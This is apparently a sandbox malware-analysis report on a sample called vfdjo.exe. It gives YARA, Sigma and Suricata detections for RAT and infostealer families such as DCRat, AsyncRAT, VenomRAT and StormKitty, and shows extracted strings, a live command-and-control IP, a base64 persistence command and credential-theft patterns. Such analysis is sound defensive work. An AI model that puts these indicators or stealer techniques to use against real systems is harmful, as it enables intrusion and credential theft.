0.2.vfdjo.exe.3fd95f0.4.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x241408:$a1: havecamera 0x53ee28:$a1: havecamera 0x28c232:$a2: timeout 3 > NUL 0x589c52:$a2: timeout 3 > NUL 0x28f5b5:$a3: START "" " 0x28faca:$a3: START "" " 0x58cfd5:$a3: START "" " 0x58d4ea:$a3: START "" " 0x28f9a5:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x58d3c5:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x28fa42:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x58d462:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x29292c:$str01: Processe: 0x59034c:$str01: Processe: 0x2927e8:$str02: Compname: 0x590208:$str02: Compname: 0x2928e2:$str04: SandBoxie: 0x590302:$str04: SandBoxie: 0x292878:$str08: WEBCAMS COUNT: 0x590298:$str08: WEBCAMS COUNT: 0x29289c:$str09: [Virtualization] 0x5902bc:$str09: [Virtualization] 0x2930ea:$str10: [Open google maps]( 0x590b0a:$str10: [Open google maps]( 0x294b61:$str11: Remember password: 0x592581:$str11: Remember password: 0x287c54:$str12: Target.Browsers.Firefox 0x585674:$str12: Target.Browsers.Firefox 0x26f3cf:$str13: Modules.Keylogger 0x56cdef:$str13: Modules.Keylogger 0x277292:$str14: ClipperAddresses 0x574cb2:$str14: ClipperAddresses 0x279437:$str15: ChromiumPswPaths
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x5db:$sk01: LimerBoy/StormKitty 0x2fdffb:$sk01: LimerBoy/StormKitty 0x252952:$str01: set_sUsername 0x550372:$str01: set_sUsername 0x25fe84:$str03: set_sExpMonth 0x55d8a4:$str03: set_sExpMonth 0x27523f:$str04: WritePasswords 0x572c5f:$str04: WritePasswords 0x275cf9:$str05: WriteCookies 0x573719:$str05: WriteCookies 0x279448:$str06: sChromiumPswPaths 0x576e68:$str06: sChromiumPswPaths 0x279423:$str07: sGeckoBrowserPaths 0x576e43:$str07: sGeckoBrowserPaths 0x28eacf:$str10: encrypted_key":"(.?)" 0x58c4ef:$str10: encrypted_key":"(.?)"
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x28fa42:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x58d462:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x28bb12:$str04: Pac_ket 0x589532:$str04: Pac_ket 0x29b830:$str05: Perfor_mance 0x599250:$str05: Perfor_mance 0x29b874:$str06: Install_ed 0x599294:$str06: Install_ed 0x245f05:$str07: get_IsConnected 0x543925:$str07: get_IsConnected 0x25c3ca:$str08: get_ActivatePo_ng 0x559dea:$str08: get_ActivatePo_ng 0x270305:$str09: isVM_by_wim_temper 0x56dd25:$str09: isVM_by_wim_temper 0x29c122:$str10: save_Plugin 0x599b42:$str10: save_Plugin 0x28c232:$str11: timeout 3 > NUL 0x589c52:$str11: timeout 3 > NUL 0x29b410:$str12: ProcessHacker.exe 0x598e30:$str12: ProcessHacker.exe 0x29b602:$str13: Select * from Win32_CacheMemory
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x28fa42:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x58d462:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x28f9a5:$s2: L2Mgc2NodGFza3MgL2 0x58d3c5:$s2: L2Mgc2NodGFza3MgL2
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x29b602:$q1: Select * from Win32_CacheMemory 0x599022:$q1: Select * from Win32_CacheMemory 0x29b642:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x599062:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x29b690:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x5990b0:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x29b6de:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x5990fe:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x293806:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x591226:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2991a1:$s1: \VPN\NordVPN 0x596bc1:$s1: \VPN\NordVPN 0x299187:$s2: \VPN\OpenVPN 0x596ba7:$s2: \VPN\OpenVPN 0x299169:$s3: \VPN\ProtonVPN 0x596b89:$s3: \VPN\ProtonVPN
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x28deeb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x58b90b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x28df5d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x58b97d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x28dfe7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x58ba07:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x28e079:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x58ba99:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x28e0e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x58bb03:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x28e155:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x58bb75:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x28e1eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x58bc0b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x28e27b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x58bc9b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x5c8:$x2: https://github.com/LimerBoy/StormKitty 0x2fdfe8:$x2: https://github.com/LimerBoy/StormKitty 0x5e4:$x3: StormKitty 0x2fe004:$x3: StormKitty 0x27dff4:$s2: GetAntivirus 0x57ba14:$s2: GetAntivirus 0x29405a:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x591a7a:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x28d4a5:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x58aec5:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x28eacd:$s6: "encrypted_key":"(.?)" 0x58c4ed:$s6: "encrypted_key":"(.?)"
0.2.vfdjo.exe.3fd95f0.4.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x28baa2:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x5894c2:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x287c16:$s6: VirtualBox 0x297795:$s6: VirtualBox 0x585636:$s6: VirtualBox 0x5951b5:$s6: VirtualBox 0x2931b2:$s8: Win32_ComputerSystem 0x2976fb:$s8: Win32_ComputerSystem 0x590bd2:$s8: Win32_ComputerSystem 0x59511b:$s8: Win32_ComputerSystem 0x2902de:$s9: Win32_Process Where ParentProcessID= 0x58dcfe:$s9: Win32_Process Where ParentProcessID= 0x28fefb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x58d91b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28ff98:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x58d9b8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2900ad:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x58dacd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x290195:$cnc4: POST / HTTP/1.1 0x58dbb5:$cnc4: POST / HTTP/1.1
0.2.vfdjo.exe.40fd37a.7.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
0.2.vfdjo.exe.40fd37a.7.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.vfdjo.exe.40fd37a.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.vfdjo.exe.40fd37a.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.vfdjo.exe.40fd37a.7.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
0.2.vfdjo.exe.40fd37a.7.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
0.2.vfdjo.exe.40fd37a.7.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x11d67e:$a1: havecamera 0x41b09e:$a1: havecamera 0x1684a8:$a2: timeout 3 > NUL 0x465ec8:$a2: timeout 3 > NUL 0x16b82b:$a3: START "" " 0x16bd40:$a3: START "" " 0x46924b:$a3: START "" " 0x469760:$a3: START "" " 0x16bc1b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x46963b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x16bcb8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x4696d8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
0.2.vfdjo.exe.40fd37a.7.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x16eba2:$str01: Processe: 0x46c5c2:$str01: Processe: 0x16ea5e:$str02: Compname: 0x46c47e:$str02: Compname: 0x16eb58:$str04: SandBoxie: 0x46c578:$str04: SandBoxie: 0x16eaee:$str08: WEBCAMS COUNT: 0x46c50e:$str08: WEBCAMS COUNT: 0x16eb12:$str09: [Virtualization] 0x46c532:$str09: [Virtualization] 0x16f360:$str10: [Open google maps]( 0x46cd80:$str10: [Open google maps]( 0x170dd7:$str11: Remember password: 0x46e7f7:$str11: Remember password: 0x163eca:$str12: Target.Browsers.Firefox 0x4618ea:$str12: Target.Browsers.Firefox 0x14b645:$str13: Modules.Keylogger 0x449065:$str13: Modules.Keylogger 0x153508:$str14: ClipperAddresses 0x450f28:$str14: ClipperAddresses 0x1556ad:$str15: ChromiumPswPaths
0.2.vfdjo.exe.40fd37a.7.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x1da271:$sk01: LimerBoy/StormKitty 0x12ebc8:$str01: set_sUsername 0x42c5e8:$str01: set_sUsername 0x13c0fa:$str03: set_sExpMonth 0x439b1a:$str03: set_sExpMonth 0x1514b5:$str04: WritePasswords 0x44eed5:$str04: WritePasswords 0x151f6f:$str05: WriteCookies 0x44f98f:$str05: WriteCookies 0x1556be:$str06: sChromiumPswPaths 0x4530de:$str06: sChromiumPswPaths 0x155699:$str07: sGeckoBrowserPaths 0x4530b9:$str07: sGeckoBrowserPaths 0x16ad45:$str10: encrypted_key":"(.?)" 0x468765:$str10: encrypted_key":"(.?)"
0.2.vfdjo.exe.40fd37a.7.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x16bcb8:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x4696d8:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x167d88:$str04: Pac_ket 0x4657a8:$str04: Pac_ket 0x177aa6:$str05: Perfor_mance 0x4754c6:$str05: Perfor_mance 0x177aea:$str06: Install_ed 0x47550a:$str06: Install_ed 0x12217b:$str07: get_IsConnected 0x41fb9b:$str07: get_IsConnected 0x138640:$str08: get_ActivatePo_ng 0x436060:$str08: get_ActivatePo_ng 0x14c57b:$str09: isVM_by_wim_temper 0x449f9b:$str09: isVM_by_wim_temper 0x178398:$str10: save_Plugin 0x475db8:$str10: save_Plugin 0x1684a8:$str11: timeout 3 > NUL 0x465ec8:$str11: timeout 3 > NUL 0x177686:$str12: ProcessHacker.exe 0x4750a6:$str12: ProcessHacker.exe 0x177878:$str13: Select * from Win32_CacheMemory
0.2.vfdjo.exe.40fd37a.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x16bcb8:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x4696d8:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x16bc1b:$s2: L2Mgc2NodGFza3MgL2 0x46963b:$s2: L2Mgc2NodGFza3MgL2
0.2.vfdjo.exe.40fd37a.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x177878:$q1: Select * from Win32_CacheMemory 0x475298:$q1: Select * from Win32_CacheMemory 0x1778b8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x4752d8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x177906:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x475326:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x177954:$d3: {55272A00-42CB-11CE-8135-00AA004BB851} 0x475374:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.vfdjo.exe.40fd37a.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x16fa7c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x46d49c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.vfdjo.exe.40fd37a.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x175417:$s1: \VPN\NordVPN 0x472e37:$s1: \VPN\NordVPN 0x1753fd:$s2: \VPN\OpenVPN 0x472e1d:$s2: \VPN\OpenVPN 0x1753df:$s3: \VPN\ProtonVPN 0x472dff:$s3: \VPN\ProtonVPN
0.2.vfdjo.exe.40fd37a.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x16a161:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x467b81:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x16a1d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x467bf3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x16a25d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x467c7d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x16a2ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x467d0f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x16a359:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x467d79:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x16a3cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x467deb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x16a461:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x467e81:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x16a4f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x467f11:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.vfdjo.exe.40fd37a.7.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x1da25e:$x2: https://github.com/LimerBoy/StormKitty 0x1da27a:$x3: StormKitty 0x15a26a:$s2: GetAntivirus 0x457c8a:$s2: GetAntivirus 0x1702d0:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x46dcf0:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x16971b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x46713b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x16ad43:$s6: "encrypted_key":"(.?)" 0x468763:$s6: "encrypted_key":"(.?)"
0.2.vfdjo.exe.40fd37a.7.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x167d18:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x465738:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x163e8c:$s6: VirtualBox 0x173a0b:$s6: VirtualBox 0x4618ac:$s6: VirtualBox 0x47142b:$s6: VirtualBox 0x16f428:$s8: Win32_ComputerSystem 0x173971:$s8: Win32_ComputerSystem 0x46ce48:$s8: Win32_ComputerSystem 0x471391:$s8: Win32_ComputerSystem 0x16c554:$s9: Win32_Process Where ParentProcessID= 0x469f74:$s9: Win32_Process Where ParentProcessID= 0x16c171:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x469b91:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x16c20e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x469c2e:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16c323:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x469d43:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x16c40b:$cnc4: POST / HTTP/1.1 0x469e2b:$cnc4: POST / HTTP/1.1
Click to see the 114 entries

Sigma Signatures

System Summary

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\vfdjo.exe", ParentImage: C:\Users\user\Desktop\vfdjo.exe, ParentProcessId: 7508, ParentProcessName: vfdjo.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline", ProcessId: 7532, ProcessName: csc.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\vfdjo.exe, ProcessId: 7508, TargetFilename: C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\vfdjo.exe", ParentImage: C:\Users\user\Desktop\vfdjo.exe, ParentProcessId: 7508, ParentProcessName: vfdjo.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline", ProcessId: 7532, ProcessName: csc.exe

Suricata Signatures

ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T08:54:07.008837+0100	2842478	1	Malware Command and Control Activity Detected	157.20.182.177	4449	192.168.2.4	49731	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: vfdjo.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.dll

Avira: detection malicious, Label: HEUR/AGEN.1300034

Multi AV Scanner detection for submitted file

Source: vfdjo.exe	ReversingLabs: Detection: 60%
Source: vfdjo.exe	Virustotal: Detection: 63%			Perma Link

Yara detected AveMaria stealer

Source: Yara match	File source: Process Memory Space: vfdjo.exe PID: 7508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTR

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.2% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: vfdjo.exe

Joe Sandbox ML: detected

Source: vfdjo.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb] source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: vfdjo.exe, 00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, vfdjo.exe, 00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 157.20.182.177:4449 -> 192.168.2.4:49731

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.vfdjo.exe.3d0d33a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAsm.exe.525b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.43fad9a.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.3fd95f0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vfdjo.exe.40fd37a.7.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49731 -> 157.20.182.177:4449

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 01 Jan 2025 07:54:01 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sat, 28 Dec 2024 19:34:32 GMTETag: "2fdc00-62a59ab2b1730"Accept-Ranges: bytesContent-Length: 3136512Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 66 5c 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ca 2f 00 00 10 00 00 00 00 00 00 be e8 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 e8 2f 00 4b 00 00 00 00 00 30 00 f7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 30 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 c8 2f 00 00 20 00 00 00 ca 2f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f7 0d 00 00 00 00 30 00 00 0e 00 00 00 cc 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 30 00 